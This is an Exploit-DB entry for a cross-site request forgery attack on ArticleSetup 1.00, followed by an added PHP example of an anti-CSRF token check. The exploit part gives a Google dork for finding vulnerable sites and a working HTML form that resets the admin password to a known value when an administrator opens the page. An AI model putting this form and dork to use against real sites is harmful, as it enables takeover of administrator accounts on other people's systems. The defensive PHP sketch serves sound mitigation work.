ArticleSetup 1.00 - CSRF Change Admin Password

2016-06-06T00:00:00
ID EDB-ID:39889
Type exploitdb
Reporter Ali Ghanbari
Modified 2016-06-06T00:00:00

Description

ArticleSetup 1.00 - CSRF Change Admin Password. Webapps exploit for php platform

                                        
<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork   : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00

#Desc:

When an admin clicks on a malicious link, the attacker can log in as a new
Administrator with the credentials detailed below.

#Exploit:
-->

<html>
 <body>
  <form method="post" action="http://localhost/{PACH}/admin/adminsettings.php">
      <input type="hidden" name="update" value="1">
      <input type="hidden" name="pass1" value="12345678">
      <input type="hidden" name="pass2" value="12345678">
      <input type="submit" value="create">
  </form>
 </body>
</html>

<!--
####################################

[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007
-->
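
The form above succeeds because the request carries only `update`, `pass1` and `pass2`, all of which a third-party page can supply. As an added example (not part of the original advisory and not ArticleSetup's own code), this is one way a password-change handler can reject such a request with a per-session anti-CSRF token; the function names and the `csrf_token` field are assumptions, and the session and POST data are passed in as arrays so the sketch runs from the PHP CLI.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical guard for a password-change handler.
// csrf_issue, csrf_valid, check_password_update and csrf_token are assumed names.

/** Create (once per session) and return the anti-CSRF token. */
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only if the request carries the token stored in the session. */
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

/** Decide whether a password update may proceed; returns the reason. */
function check_password_update(array $session, array $post): string
{
    if (!csrf_valid($session, $post)) {
        return 'rejected: missing or wrong CSRF token';
    }
    if (($post['pass1'] ?? '') === '' || $post['pass1'] !== ($post['pass2'] ?? null)) {
        return 'rejected: passwords empty or do not match';
    }
    return 'accepted';
}

// Constructed sample requests (not captured traffic).
$session = [];
$token   = csrf_issue($session); // the genuine form embeds this as a hidden field

$forged = ['update' => '1', 'pass1' => 'x', 'pass2' => 'x']; // cross-site form: no token
$legit  = $forged + ['csrf_token' => $token];                // same fields plus the token

echo check_password_update($session, $forged), PHP_EOL; // rejected: missing or wrong CSRF token
echo check_password_update($session, $legit), PHP_EOL;  // accepted
```

In a real handler the two arrays would be `$_SESSION` and `$_POST`, with the check performed before any database write.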